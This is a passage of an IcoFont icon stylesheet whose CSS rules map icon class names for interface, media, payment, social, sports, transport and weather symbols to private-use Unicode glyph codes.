.icofont-thermometer:before
{
  content: "\ec3b";
}

.icofont-tooth:before
{
  content: "\ec3c";
}

.icofont-xray:before
{
  content: "\ec3d";
}

.icofont-ui-add:before
{
  content: "\ec3e";
}

.icofont-ui-alarm:before
{
  content: "\ec3f";
}

.icofont-ui-battery:before
{
  content: "\ec40";
}

.icofont-ui-block:before
{
  content: "\ec41";
}

.icofont-ui-bluetooth:before
{
  content: "\ec42";
}

.icofont-ui-brightness:before
{
  content: "\ec43";
}

.icofont-ui-browser:before
{
  content: "\ec44";
}

.icofont-ui-calendar:before
{
  content: "\ec45";
}

.icofont-ui-call:before
{
  content: "\ec46";
}

.icofont-ui-camera:before
{
  content: "\ec47";
}

.icofont-ui-cart:before
{
  content: "\ec48";
}

.icofont-ui-cell-phone:before
{
  content: "\ec49";
}

.icofont-ui-chat:before
{
  content: "\ec4a";
}

.icofont-ui-check:before
{
  content: "\ec4b";
}

.icofont-ui-clip-board:before
{
  content: "\ec4c";
}

.icofont-ui-clip:before
{
  content: "\ec4d";
}

.icofont-ui-clock:before
{
  content: "\ec4e";
}

.icofont-ui-close:before
{
  content: "\ec4f";
}

.icofont-ui-contact-list:before
{
  content: "\ec50";
}

.icofont-ui-copy:before
{
  content: "\ec51";
}

.icofont-ui-cut:before
{
  content: "\ec52";
}

.icofont-ui-delete:before
{
  content: "\ec53";
}

.icofont-ui-dial-phone:before
{
  content: "\ec54";
}

.icofont-ui-edit:before
{
  content: "\ec55";
}

.icofont-ui-email:before
{
  content: "\ec56";
}

.icofont-ui-file:before
{
  content: "\ec57";
}

.icofont-ui-fire-wall:before
{
  content: "\ec58";
}

.icofont-ui-flash-light:before
{
  content: "\ec59";
}

.icofont-ui-flight:before
{
  content: "\ec5a";
}

.icofont-ui-folder:before
{
  content: "\ec5b";
}

.icofont-ui-game:before
{
  content: "\ec5c";
}

.icofont-ui-handicapped:before
{
  content: "\ec5d";
}

.icofont-ui-home:before
{
  content: "\ec5e";
}

.icofont-ui-image:before
{
  content: "\ec5f";
}

.icofont-ui-laoding:before
{
  content: "\ec60";
}

.icofont-ui-lock:before
{
  content: "\ec61";
}

.icofont-ui-love-add:before
{
  content: "\ec62";
}

.icofont-ui-love-broken:before
{
  content: "\ec63";
}

.icofont-ui-love-remove:before
{
  content: "\ec64";
}

.icofont-ui-love:before
{
  content: "\ec65";
}

.icofont-ui-map:before
{
  content: "\ec66";
}

.icofont-ui-message:before
{
  content: "\ec67";
}

.icofont-ui-messaging:before
{
  content: "\ec68";
}

.icofont-ui-movie:before
{
  content: "\ec69";
}

.icofont-ui-music-player:before
{
  content: "\ec6a";
}

.icofont-ui-music:before
{
  content: "\ec6b";
}

.icofont-ui-mute:before
{
  content: "\ec6c";
}

.icofont-ui-network:before
{
  content: "\ec6d";
}

.icofont-ui-next:before
{
  content: "\ec6e";
}

.icofont-ui-note:before
{
  content: "\ec6f";
}

.icofont-ui-office:before
{
  content: "\ec70";
}

.icofont-ui-password:before
{
  content: "\ec71";
}

.icofont-ui-pause:before
{
  content: "\ec72";
}

.icofont-ui-play-stop:before
{
  content: "\ec73";
}

.icofont-ui-play:before
{
  content: "\ec74";
}

.icofont-ui-pointer:before
{
  content: "\ec75";
}

.icofont-ui-power:before
{
  content: "\ec76";
}

.icofont-ui-press:before
{
  content: "\ec77";
}

.icofont-ui-previous:before
{
  content: "\ec78";
}

.icofont-ui-rate-add:before
{
  content: "\ec79";
}

.icofont-ui-rate-blank:before
{
  content: "\ec7a";
}

.icofont-ui-rate-remove:before
{
  content: "\ec7b";
}

.icofont-ui-rating:before
{
  content: "\ec7c";
}

.icofont-ui-record:before
{
  content: "\ec7d";
}

.icofont-ui-remove:before
{
  content: "\ec7e";
}

.icofont-ui-reply:before
{
  content: "\ec7f";
}

.icofont-ui-rotation:before
{
  content: "\ec80";
}

.icofont-ui-rss:before
{
  content: "\ec81";
}

.icofont-ui-search:before
{
  content: "\ec82";
}

.icofont-ui-settings:before
{
  content: "\ec83";
}

.icofont-ui-social-link:before
{
  content: "\ec84";
}

.icofont-ui-tag:before
{
  content: "\ec85";
}

.icofont-ui-text-chat:before
{
  content: "\ec86";
}

.icofont-ui-text-loading:before
{
  content: "\ec87";
}

.icofont-ui-theme:before
{
  content: "\ec88";
}

.icofont-ui-timer:before
{
  content: "\ec89";
}

.icofont-ui-touch-phone:before
{
  content: "\ec8a";
}

.icofont-ui-travel:before
{
  content: "\ec8b";
}

.icofont-ui-unlock:before
{
  content: "\ec8c";
}

.icofont-ui-user-group:before
{
  content: "\ec8d";
}

.icofont-ui-user:before
{
  content: "\ec8e";
}

.icofont-ui-v-card:before
{
  content: "\ec8f";
}

.icofont-ui-video-chat:before
{
  content: "\ec90";
}

.icofont-ui-video-message:before
{
  content: "\ec91";
}

.icofont-ui-video-play:before
{
  content: "\ec92";
}

.icofont-ui-video:before
{
  content: "\ec93";
}

.icofont-ui-volume:before
{
  content: "\ec94";
}

.icofont-ui-weather:before
{
  content: "\ec95";
}

.icofont-ui-wifi:before
{
  content: "\ec96";
}

.icofont-ui-zoom-in:before
{
  content: "\ec97";
}

.icofont-ui-zoom-out:before
{
  content: "\ec98";
}

.icofont-cassette-player:before
{
  content: "\ec99";
}

.icofont-cassette:before
{
  content: "\ec9a";
}

.icofont-forward:before
{
  content: "\ec9b";
}

.icofont-guiter:before
{
  content: "\ec9c";
}

.icofont-movie:before
{
  content: "\ec9d";
}

.icofont-multimedia:before
{
  content: "\ec9e";
}

.icofont-music-alt:before
{
  content: "\ec9f";
}

.icofont-music-disk:before
{
  content: "\eca0";
}

.icofont-music-note:before
{
  content: "\eca1";
}

.icofont-music-notes:before
{
  content: "\eca2";
}

.icofont-music:before
{
  content: "\eca3";
}

.icofont-mute-volume:before
{
  content: "\eca4";
}

.icofont-pause:before
{
  content: "\eca5";
}

.icofont-play-alt-1:before
{
  content: "\eca6";
}

.icofont-play-alt-2:before
{
  content: "\eca7";
}

.icofont-play-alt-3:before
{
  content: "\eca8";
}

.icofont-play-pause:before
{
  content: "\eca9";
}

.icofont-play:before
{
  content: "\ecaa";
}

.icofont-record:before
{
  content: "\ecab";
}

.icofont-retro-music-disk:before
{
  content: "\ecac";
}

.icofont-rewind:before
{
  content: "\ecad";
}

.icofont-song-notes:before
{
  content: "\ecae";
}

.icofont-sound-wave-alt:before
{
  content: "\ecaf";
}

.icofont-sound-wave:before
{
  content: "\ecb0";
}

.icofont-stop:before
{
  content: "\ecb1";
}

.icofont-video-alt:before
{
  content: "\ecb2";
}

.icofont-video-cam:before
{
  content: "\ecb3";
}

.icofont-video-clapper:before
{
  content: "\ecb4";
}

.icofont-video:before
{
  content: "\ecb5";
}

.icofont-volume-bar:before
{
  content: "\ecb6";
}

.icofont-volume-down:before
{
  content: "\ecb7";
}

.icofont-volume-mute:before
{
  content: "\ecb8";
}

.icofont-volume-off:before
{
  content: "\ecb9";
}

.icofont-volume-up:before
{
  content: "\ecba";
}

.icofont-youtube-play:before
{
  content: "\ecbb";
}

.icofont-2checkout-alt:before
{
  content: "\ecbc";
}

.icofont-2checkout:before
{
  content: "\ecbd";
}

.icofont-amazon-alt:before
{
  content: "\ecbe";
}

.icofont-amazon:before
{
  content: "\ecbf";
}

.icofont-american-express-alt:before
{
  content: "\ecc0";
}

.icofont-american-express:before
{
  content: "\ecc1";
}

.icofont-apple-pay-alt:before
{
  content: "\ecc2";
}

.icofont-apple-pay:before
{
  content: "\ecc3";
}

.icofont-bank-transfer-alt:before
{
  content: "\ecc4";
}

.icofont-bank-transfer:before
{
  content: "\ecc5";
}

.icofont-braintree-alt:before
{
  content: "\ecc6";
}

.icofont-braintree:before
{
  content: "\ecc7";
}

.icofont-cash-on-delivery-alt:before
{
  content: "\ecc8";
}

.icofont-cash-on-delivery:before
{
  content: "\ecc9";
}

.icofont-diners-club-alt-1:before
{
  content: "\ecca";
}

.icofont-diners-club-alt-2:before
{
  content: "\eccb";
}

.icofont-diners-club-alt-3:before
{
  content: "\eccc";
}

.icofont-diners-club:before
{
  content: "\eccd";
}

.icofont-discover-alt:before
{
  content: "\ecce";
}

.icofont-discover:before
{
  content: "\eccf";
}

.icofont-eway-alt:before
{
  content: "\ecd0";
}

.icofont-eway:before
{
  content: "\ecd1";
}

.icofont-google-wallet-alt-1:before
{
  content: "\ecd2";
}

.icofont-google-wallet-alt-2:before
{
  content: "\ecd3";
}

.icofont-google-wallet-alt-3:before
{
  content: "\ecd4";
}

.icofont-google-wallet:before
{
  content: "\ecd5";
}

.icofont-jcb-alt:before
{
  content: "\ecd6";
}

.icofont-jcb:before
{
  content: "\ecd7";
}

.icofont-maestro-alt:before
{
  content: "\ecd8";
}

.icofont-maestro:before
{
  content: "\ecd9";
}

.icofont-mastercard-alt:before
{
  content: "\ecda";
}

.icofont-mastercard:before
{
  content: "\ecdb";
}

.icofont-payoneer-alt:before
{
  content: "\ecdc";
}

.icofont-payoneer:before
{
  content: "\ecdd";
}

.icofont-paypal-alt:before
{
  content: "\ecde";
}

.icofont-paypal:before
{
  content: "\ecdf";
}

.icofont-sage-alt:before
{
  content: "\ece0";
}

.icofont-sage:before
{
  content: "\ece1";
}

.icofont-skrill-alt:before
{
  content: "\ece2";
}

.icofont-skrill:before
{
  content: "\ece3";
}

.icofont-stripe-alt:before
{
  content: "\ece4";
}

.icofont-stripe:before
{
  content: "\ece5";
}

.icofont-visa-alt:before
{
  content: "\ece6";
}

.icofont-visa-electron:before
{
  content: "\ece7";
}

.icofont-visa:before
{
  content: "\ece8";
}

.icofont-western-union-alt:before
{
  content: "\ece9";
}

.icofont-western-union:before
{
  content: "\ecea";
}

.icofont-boy:before
{
  content: "\eceb";
}

.icofont-business-man-alt-1:before
{
  content: "\ecec";
}

.icofont-business-man-alt-2:before
{
  content: "\eced";
}

.icofont-business-man-alt-3:before
{
  content: "\ecee";
}

.icofont-business-man:before
{
  content: "\ecef";
}

.icofont-female:before
{
  content: "\ecf0";
}

.icofont-funky-man:before
{
  content: "\ecf1";
}

.icofont-girl-alt:before
{
  content: "\ecf2";
}

.icofont-girl:before
{
  content: "\ecf3";
}

.icofont-group:before
{
  content: "\ecf4";
}

.icofont-hotel-boy-alt:before
{
  content: "\ecf5";
}

.icofont-hotel-boy:before
{
  content: "\ecf6";
}

.icofont-kid:before
{
  content: "\ecf7";
}

.icofont-man-in-glasses:before
{
  content: "\ecf8";
}

.icofont-people:before
{
  content: "\ecf9";
}

.icofont-support:before
{
  content: "\ecfa";
}

.icofont-user-alt-1:before
{
  content: "\ecfb";
}

.icofont-user-alt-2:before
{
  content: "\ecfc";
}

.icofont-user-alt-3:before
{
  content: "\ecfd";
}

.icofont-user-alt-4:before
{
  content: "\ecfe";
}

.icofont-user-alt-5:before
{
  content: "\ecff";
}

.icofont-user-alt-6:before
{
  content: "\ed00";
}

.icofont-user-alt-7:before
{
  content: "\ed01";
}

.icofont-user-female:before
{
  content: "\ed02";
}

.icofont-user-male:before
{
  content: "\ed03";
}

.icofont-user-suited:before
{
  content: "\ed04";
}

.icofont-user:before
{
  content: "\ed05";
}

.icofont-users-alt-1:before
{
  content: "\ed06";
}

.icofont-users-alt-2:before
{
  content: "\ed07";
}

.icofont-users-alt-3:before
{
  content: "\ed08";
}

.icofont-users-alt-4:before
{
  content: "\ed09";
}

.icofont-users-alt-5:before
{
  content: "\ed0a";
}

.icofont-users-alt-6:before
{
  content: "\ed0b";
}

.icofont-users-social:before
{
  content: "\ed0c";
}

.icofont-users:before
{
  content: "\ed0d";
}

.icofont-waiter-alt:before
{
  content: "\ed0e";
}

.icofont-waiter:before
{
  content: "\ed0f";
}

.icofont-woman-in-glasses:before
{
  content: "\ed10";
}

.icofont-search-1:before
{
  content: "\ed11";
}

.icofont-search-2:before
{
  content: "\ed12";
}

.icofont-search-document:before
{
  content: "\ed13";
}

.icofont-search-folder:before
{
  content: "\ed14";
}

.icofont-search-job:before
{
  content: "\ed15";
}

.icofont-search-map:before
{
  content: "\ed16";
}

.icofont-search-property:before
{
  content: "\ed17";
}

.icofont-search-restaurant:before
{
  content: "\ed18";
}

.icofont-search-stock:before
{
  content: "\ed19";
}

.icofont-search-user:before
{
  content: "\ed1a";
}

.icofont-search:before
{
  content: "\ed1b";
}

.icofont-500px:before
{
  content: "\ed1c";
}

.icofont-aim:before
{
  content: "\ed1d";
}

.icofont-badoo:before
{
  content: "\ed1e";
}

.icofont-baidu-tieba:before
{
  content: "\ed1f";
}

.icofont-bbm-messenger:before
{
  content: "\ed20";
}

.icofont-bebo:before
{
  content: "\ed21";
}

.icofont-behance:before
{
  content: "\ed22";
}

.icofont-blogger:before
{
  content: "\ed23";
}

.icofont-bootstrap:before
{
  content: "\ed24";
}

.icofont-brightkite:before
{
  content: "\ed25";
}

.icofont-cloudapp:before
{
  content: "\ed26";
}

.icofont-concrete5:before
{
  content: "\ed27";
}

.icofont-delicious:before
{
  content: "\ed28";
}

.icofont-designbump:before
{
  content: "\ed29";
}

.icofont-designfloat:before
{
  content: "\ed2a";
}

.icofont-deviantart:before
{
  content: "\ed2b";
}

.icofont-digg:before
{
  content: "\ed2c";
}

.icofont-dotcms:before
{
  content: "\ed2d";
}

.icofont-dribbble:before
{
  content: "\ed2e";
}

.icofont-dribble:before
{
  content: "\ed2f";
}

.icofont-dropbox:before
{
  content: "\ed30";
}

.icofont-ebuddy:before
{
  content: "\ed31";
}

.icofont-ello:before
{
  content: "\ed32";
}

.icofont-ember:before
{
  content: "\ed33";
}

.icofont-envato:before
{
  content: "\ed34";
}

.icofont-evernote:before
{
  content: "\ed35";
}

.icofont-facebook-messenger:before
{
  content: "\ed36";
}

.icofont-facebook:before
{
  content: "\ed37";
}

.icofont-feedburner:before
{
  content: "\ed38";
}

.icofont-flikr:before
{
  content: "\ed39";
}

.icofont-folkd:before
{
  content: "\ed3a";
}

.icofont-foursquare:before
{
  content: "\ed3b";
}

.icofont-friendfeed:before
{
  content: "\ed3c";
}

.icofont-ghost:before
{
  content: "\ed3d";
}

.icofont-github:before
{
  content: "\ed3e";
}

.icofont-gnome:before
{
  content: "\ed3f";
}

.icofont-google-buzz:before
{
  content: "\ed40";
}

.icofont-google-hangouts:before
{
  content: "\ed41";
}

.icofont-google-map:before
{
  content: "\ed42";
}

.icofont-google-plus:before
{
  content: "\ed43";
}

.icofont-google-talk:before
{
  content: "\ed44";
}

.icofont-hype-machine:before
{
  content: "\ed45";
}

.icofont-instagram:before
{
  content: "\ed46";
}

.icofont-kakaotalk:before
{
  content: "\ed47";
}

.icofont-kickstarter:before
{
  content: "\ed48";
}

.icofont-kik:before
{
  content: "\ed49";
}

.icofont-kiwibox:before
{
  content: "\ed4a";
}

.icofont-line-messenger:before
{
  content: "\ed4b";
}

.icofont-line:before
{
  content: "\ed4c";
}

.icofont-linkedin:before
{
  content: "\ed4d";
}

.icofont-linux-mint:before
{
  content: "\ed4e";
}

.icofont-live-messenger:before
{
  content: "\ed4f";
}

.icofont-livejournal:before
{
  content: "\ed50";
}

.icofont-magento:before
{
  content: "\ed51";
}

.icofont-meetme:before
{
  content: "\ed52";
}

.icofont-meetup:before
{
  content: "\ed53";
}

.icofont-mixx:before
{
  content: "\ed54";
}

.icofont-newsvine:before
{
  content: "\ed55";
}

.icofont-nimbuss:before
{
  content: "\ed56";
}

.icofont-odnoklassniki:before
{
  content: "\ed57";
}

.icofont-opencart:before
{
  content: "\ed58";
}

.icofont-oscommerce:before
{
  content: "\ed59";
}

.icofont-pandora:before
{
  content: "\ed5a";
}

.icofont-photobucket:before
{
  content: "\ed5b";
}

.icofont-picasa:before
{
  content: "\ed5c";
}

.icofont-pinterest:before
{
  content: "\ed5d";
}

.icofont-prestashop:before
{
  content: "\ed5e";
}

.icofont-qik:before
{
  content: "\ed5f";
}

.icofont-qq:before
{
  content: "\ed60";
}

.icofont-readernaut:before
{
  content: "\ed61";
}

.icofont-reddit:before
{
  content: "\ed62";
}

.icofont-renren:before
{
  content: "\ed63";
}

.icofont-rss:before
{
  content: "\ed64";
}

.icofont-shopify:before
{
  content: "\ed65";
}

.icofont-silverstripe:before
{
  content: "\ed66";
}

.icofont-skype:before
{
  content: "\ed67";
}

.icofont-slack:before
{
  content: "\ed68";
}

.icofont-slashdot:before
{
  content: "\ed69";
}

.icofont-slidshare:before
{
  content: "\ed6a";
}

.icofont-smugmug:before
{
  content: "\ed6b";
}

.icofont-snapchat:before
{
  content: "\ed6c";
}

.icofont-soundcloud:before
{
  content: "\ed6d";
}

.icofont-spotify:before
{
  content: "\ed6e";
}

.icofont-stack-exchange:before
{
  content: "\ed6f";
}

.icofont-stack-overflow:before
{
  content: "\ed70";
}

.icofont-steam:before
{
  content: "\ed71";
}

.icofont-stumbleupon:before
{
  content: "\ed72";
}

.icofont-tagged:before
{
  content: "\ed73";
}

.icofont-technorati:before
{
  content: "\ed74";
}

.icofont-telegram:before
{
  content: "\ed75";
}

.icofont-tinder:before
{
  content: "\ed76";
}

.icofont-trello:before
{
  content: "\ed77";
}

.icofont-tumblr:before
{
  content: "\ed78";
}

.icofont-twitch:before
{
  content: "\ed79";
}

.icofont-twitter:before
{
  content: "\ed7a";
}

.icofont-typo3:before
{
  content: "\ed7b";
}

.icofont-ubercart:before
{
  content: "\ed7c";
}

.icofont-viber:before
{
  content: "\ed7d";
}

.icofont-viddler:before
{
  content: "\ed7e";
}

.icofont-vimeo:before
{
  content: "\ed7f";
}

.icofont-vine:before
{
  content: "\ed80";
}

.icofont-virb:before
{
  content: "\ed81";
}

.icofont-virtuemart:before
{
  content: "\ed82";
}

.icofont-vk:before
{
  content: "\ed83";
}

.icofont-wechat:before
{
  content: "\ed84";
}

.icofont-weibo:before
{
  content: "\ed85";
}

.icofont-whatsapp:before
{
  content: "\ed86";
}

.icofont-xing:before
{
  content: "\ed87";
}

.icofont-yahoo:before
{
  content: "\ed88";
}

.icofont-yelp:before
{
  content: "\ed89";
}

.icofont-youku:before
{
  content: "\ed8a";
}

.icofont-youtube:before
{
  content: "\ed8b";
}

.icofont-zencart:before
{
  content: "\ed8c";
}

.icofont-badminton-birdie:before
{
  content: "\ed8d";
}

.icofont-baseball:before
{
  content: "\ed8e";
}

.icofont-baseballer:before
{
  content: "\ed8f";
}

.icofont-basketball-hoop:before
{
  content: "\ed90";
}

.icofont-basketball:before
{
  content: "\ed91";
}

.icofont-billiard-ball:before
{
  content: "\ed92";
}

.icofont-boot-alt-1:before
{
  content: "\ed93";
}

.icofont-boot-alt-2:before
{
  content: "\ed94";
}

.icofont-boot:before
{
  content: "\ed95";
}

.icofont-bowling-alt:before
{
  content: "\ed96";
}

.icofont-bowling:before
{
  content: "\ed97";
}

.icofont-canoe:before
{
  content: "\ed98";
}

.icofont-cheer-leader:before
{
  content: "\ed99";
}

.icofont-climbing:before
{
  content: "\ed9a";
}

.icofont-corner:before
{
  content: "\ed9b";
}

.icofont-field-alt:before
{
  content: "\ed9c";
}

.icofont-field:before
{
  content: "\ed9d";
}

.icofont-football-alt:before
{
  content: "\ed9e";
}

.icofont-football-american:before
{
  content: "\ed9f";
}

.icofont-football:before
{
  content: "\eda0";
}

.icofont-foul:before
{
  content: "\eda1";
}

.icofont-goal-keeper:before
{
  content: "\eda2";
}

.icofont-goal:before
{
  content: "\eda3";
}

.icofont-golf-alt:before
{
  content: "\eda4";
}

.icofont-golf-bag:before
{
  content: "\eda5";
}

.icofont-golf-cart:before
{
  content: "\eda6";
}

.icofont-golf-field:before
{
  content: "\eda7";
}

.icofont-golf:before
{
  content: "\eda8";
}

.icofont-golfer:before
{
  content: "\eda9";
}

.icofont-helmet:before
{
  content: "\edaa";
}

.icofont-hockey-alt:before
{
  content: "\edab";
}

.icofont-hockey:before
{
  content: "\edac";
}

.icofont-ice-skate:before
{
  content: "\edad";
}

.icofont-jersey-alt:before
{
  content: "\edae";
}

.icofont-jersey:before
{
  content: "\edaf";
}

.icofont-jumping:before
{
  content: "\edb0";
}

.icofont-kick:before
{
  content: "\edb1";
}

.icofont-leg:before
{
  content: "\edb2";
}

.icofont-match-review:before
{
  content: "\edb3";
}

.icofont-medal-sport:before
{
  content: "\edb4";
}

.icofont-offside:before
{
  content: "\edb5";
}

.icofont-olympic-logo:before
{
  content: "\edb6";
}

.icofont-olympic:before
{
  content: "\edb7";
}

.icofont-padding:before
{
  content: "\edb8";
}

.icofont-penalty-card:before
{
  content: "\edb9";
}

.icofont-racer:before
{
  content: "\edba";
}

.icofont-racing-car:before
{
  content: "\edbb";
}

.icofont-racing-flag-alt:before
{
  content: "\edbc";
}

.icofont-racing-flag:before
{
  content: "\edbd";
}

.icofont-racings-wheel:before
{
  content: "\edbe";
}

.icofont-referee:before
{
  content: "\edbf";
}

.icofont-refree-jersey:before
{
  content: "\edc0";
}

.icofont-result-sport:before
{
  content: "\edc1";
}

.icofont-rugby-ball:before
{
  content: "\edc2";
}

.icofont-rugby-player:before
{
  content: "\edc3";
}

.icofont-rugby:before
{
  content: "\edc4";
}

.icofont-runner-alt-1:before
{
  content: "\edc5";
}

.icofont-runner-alt-2:before
{
  content: "\edc6";
}

.icofont-runner:before
{
  content: "\edc7";
}

.icofont-score-board:before
{
  content: "\edc8";
}

.icofont-skiing-man:before
{
  content: "\edc9";
}

.icofont-skydiving-goggles:before
{
  content: "\edca";
}

.icofont-snow-mobile:before
{
  content: "\edcb";
}

.icofont-steering:before
{
  content: "\edcc";
}

.icofont-stopwatch:before
{
  content: "\edcd";
}

.icofont-substitute:before
{
  content: "\edce";
}

.icofont-swimmer:before
{
  content: "\edcf";
}

.icofont-table-tennis:before
{
  content: "\edd0";
}

.icofont-team-alt:before
{
  content: "\edd1";
}

.icofont-team:before
{
  content: "\edd2";
}

.icofont-tennis-player:before
{
  content: "\edd3";
}

.icofont-tennis:before
{
  content: "\edd4";
}

.icofont-tracking:before
{
  content: "\edd5";
}

.icofont-trophy-alt:before
{
  content: "\edd6";
}

.icofont-trophy:before
{
  content: "\edd7";
}

.icofont-volleyball-alt:before
{
  content: "\edd8";
}

.icofont-volleyball-fire:before
{
  content: "\edd9";
}

.icofont-volleyball:before
{
  content: "\edda";
}

.icofont-water-bottle:before
{
  content: "\eddb";
}

.icofont-whistle-alt:before
{
  content: "\eddc";
}

.icofont-whistle:before
{
  content: "\eddd";
}

.icofont-win-trophy:before
{
  content: "\edde";
}

.icofont-align-center:before
{
  content: "\eddf";
}

.icofont-align-left:before
{
  content: "\ede0";
}

.icofont-align-right:before
{
  content: "\ede1";
}

.icofont-all-caps:before
{
  content: "\ede2";
}

.icofont-bold:before
{
  content: "\ede3";
}

.icofont-brush:before
{
  content: "\ede4";
}

.icofont-clip-board:before
{
  content: "\ede5";
}

.icofont-code-alt:before
{
  content: "\ede6";
}

.icofont-color-bucket:before
{
  content: "\ede7";
}

.icofont-color-picker:before
{
  content: "\ede8";
}

.icofont-copy-invert:before
{
  content: "\ede9";
}

.icofont-copy:before
{
  content: "\edea";
}

.icofont-cut:before
{
  content: "\edeb";
}

.icofont-delete-alt:before
{
  content: "\edec";
}

.icofont-edit-alt:before
{
  content: "\eded";
}

.icofont-eraser-alt:before
{
  content: "\edee";
}

.icofont-font:before
{
  content: "\edef";
}

.icofont-heading:before
{
  content: "\edf0";
}

.icofont-indent:before
{
  content: "\edf1";
}

.icofont-italic-alt:before
{
  content: "\edf2";
}

.icofont-italic:before
{
  content: "\edf3";
}

.icofont-justify-all:before
{
  content: "\edf4";
}

.icofont-justify-center:before
{
  content: "\edf5";
}

.icofont-justify-left:before
{
  content: "\edf6";
}

.icofont-justify-right:before
{
  content: "\edf7";
}

.icofont-link-broken:before
{
  content: "\edf8";
}

.icofont-outdent:before
{
  content: "\edf9";
}

.icofont-paper-clip:before
{
  content: "\edfa";
}

.icofont-paragraph:before
{
  content: "\edfb";
}

.icofont-pin:before
{
  content: "\edfc";
}

.icofont-printer:before
{
  content: "\edfd";
}

.icofont-redo:before
{
  content: "\edfe";
}

.icofont-rotation:before
{
  content: "\edff";
}

.icofont-save:before
{
  content: "\ee00";
}

.icofont-small-cap:before
{
  content: "\ee01";
}

.icofont-strike-through:before
{
  content: "\ee02";
}

.icofont-sub-listing:before
{
  content: "\ee03";
}

.icofont-subscript:before
{
  content: "\ee04";
}

.icofont-superscript:before
{
  content: "\ee05";
}

.icofont-table:before
{
  content: "\ee06";
}

.icofont-text-height:before
{
  content: "\ee07";
}

.icofont-text-width:before
{
  content: "\ee08";
}

.icofont-trash:before
{
  content: "\ee09";
}

.icofont-underline:before
{
  content: "\ee0a";
}

.icofont-undo:before
{
  content: "\ee0b";
}

.icofont-air-balloon:before
{
  content: "\ee0c";
}

.icofont-airplane-alt:before
{
  content: "\ee0d";
}

.icofont-airplane:before
{
  content: "\ee0e";
}

.icofont-articulated-truck:before
{
  content: "\ee0f";
}

.icofont-auto-mobile:before
{
  content: "\ee10";
}

.icofont-auto-rickshaw:before
{
  content: "\ee11";
}

.icofont-bicycle-alt-1:before
{
  content: "\ee12";
}

.icofont-bicycle-alt-2:before
{
  content: "\ee13";
}

.icofont-bicycle:before
{
  content: "\ee14";
}

.icofont-bus-alt-1:before
{
  content: "\ee15";
}

.icofont-bus-alt-2:before
{
  content: "\ee16";
}

.icofont-bus-alt-3:before
{
  content: "\ee17";
}

.icofont-bus:before
{
  content: "\ee18";
}

.icofont-cab:before
{
  content: "\ee19";
}

.icofont-cable-car:before
{
  content: "\ee1a";
}

.icofont-car-alt-1:before
{
  content: "\ee1b";
}

.icofont-car-alt-2:before
{
  content: "\ee1c";
}

.icofont-car-alt-3:before
{
  content: "\ee1d";
}

.icofont-car-alt-4:before
{
  content: "\ee1e";
}

.icofont-car:before
{
  content: "\ee1f";
}

.icofont-delivery-time:before
{
  content: "\ee20";
}

.icofont-fast-delivery:before
{
  content: "\ee21";
}

.icofont-fire-truck-alt:before
{
  content: "\ee22";
}

.icofont-fire-truck:before
{
  content: "\ee23";
}

.icofont-free-delivery:before
{
  content: "\ee24";
}

.icofont-helicopter:before
{
  content: "\ee25";
}

.icofont-motor-bike-alt:before
{
  content: "\ee26";
}

.icofont-motor-bike:before
{
  content: "\ee27";
}

.icofont-motor-biker:before
{
  content: "\ee28";
}

.icofont-oil-truck:before
{
  content: "\ee29";
}

.icofont-rickshaw:before
{
  content: "\ee2a";
}

.icofont-rocket-alt-1:before
{
  content: "\ee2b";
}

.icofont-rocket-alt-2:before
{
  content: "\ee2c";
}

.icofont-rocket:before
{
  content: "\ee2d";
}

.icofont-sail-boat-alt-1:before
{
  content: "\ee2e";
}

.icofont-sail-boat-alt-2:before
{
  content: "\ee2f";
}

.icofont-sail-boat:before
{
  content: "\ee30";
}

.icofont-scooter:before
{
  content: "\ee31";
}

.icofont-sea-plane:before
{
  content: "\ee32";
}

.icofont-ship-alt:before
{
  content: "\ee33";
}

.icofont-ship:before
{
  content: "\ee34";
}

.icofont-speed-boat:before
{
  content: "\ee35";
}

.icofont-taxi:before
{
  content: "\ee36";
}

.icofont-tractor:before
{
  content: "\ee37";
}

.icofont-train-line:before
{
  content: "\ee38";
}

.icofont-train-steam:before
{
  content: "\ee39";
}

.icofont-tram:before
{
  content: "\ee3a";
}

.icofont-truck-alt:before
{
  content: "\ee3b";
}

.icofont-truck-loaded:before
{
  content: "\ee3c";
}

.icofont-truck:before
{
  content: "\ee3d";
}

.icofont-van-alt:before
{
  content: "\ee3e";
}

.icofont-van:before
{
  content: "\ee3f";
}

.icofont-yacht:before
{
  content: "\ee40";
}

.icofont-5-star-hotel:before
{
  content: "\ee41";
}

.icofont-air-ticket:before
{
  content: "\ee42";
}

.icofont-beach-bed:before
{
  content: "\ee43";
}

.icofont-beach:before
{
  content: "\ee44";
}

.icofont-camping-vest:before
{
  content: "\ee45";
}

.icofont-direction-sign:before
{
  content: "\ee46";
}

.icofont-hill-side:before
{
  content: "\ee47";
}

.icofont-hill:before
{
  content: "\ee48";
}

.icofont-hotel:before
{
  content: "\ee49";
}

.icofont-island-alt:before
{
  content: "\ee4a";
}

.icofont-island:before
{
  content: "\ee4b";
}

.icofont-sandals-female:before
{
  content: "\ee4c";
}

.icofont-sandals-male:before
{
  content: "\ee4d";
}

.icofont-travelling:before
{
  content: "\ee4e";
}

.icofont-breakdown:before
{
  content: "\ee4f";
}

.icofont-celsius:before
{
  content: "\ee50";
}

.icofont-clouds:before
{
  content: "\ee51";
}

.icofont-cloudy:before
{
  content: "\ee52";
}

.icofont-dust:before
{
  content: "\ee53";
}

.icofont-eclipse:before
{
  content: "\ee54";
}

.icofont-fahrenheit:before
{
  content: "\ee55";
}

.icofont-forest-fire:before
{
  content: "\ee56";
}

.icofont-full-night:before
{
  content: "\ee57";
}

.icofont-full-sunny:before
{
  content: "\ee58";
}

.icofont-hail-night:before
{
  content: "\ee59";
}

.icofont-hail-rainy-night:before
{
  content: "\ee5a";
}

.icofont-hail-rainy-sunny:before
{
  content: "\ee5b";
}

.icofont-hail-rainy:before
{
  content: "\ee5c";
}

.icofont-hail-sunny:before
{
  content: "\ee5d";
}

.icofont-hail-thunder-night:before
{
  content: "\ee5e";
}

.icofont-hail-thunder-sunny:before
{
  content: "\ee5f";
}

.icofont-hail-thunder:before
{
  content: "\ee60";
}

.icofont-hail:before
{
  content: "\ee61";
}

.icofont-hill-night:before
{
  content: "\ee62";
}

.icofont-hill-sunny:before
{
  content: "\ee63";
}

.icofont-hurricane:before
{
  content: "\ee64";
}

.icofont-meteor:before
{
  content: "\ee65";
}

.icofont-night:before
{
  content: "\ee66";
}

.icofont-rainy-night:before
{
  content: "\ee67";
}

.icofont-rainy-sunny:before
{
  content: "\ee68";
}

.icofont-rainy-thunder:before
{
  content: "\ee69";
}

.icofont-rainy:before
{
  content: "\ee6a";
}

.icofont-snow-alt:before
{
  content: "\ee6b";
}

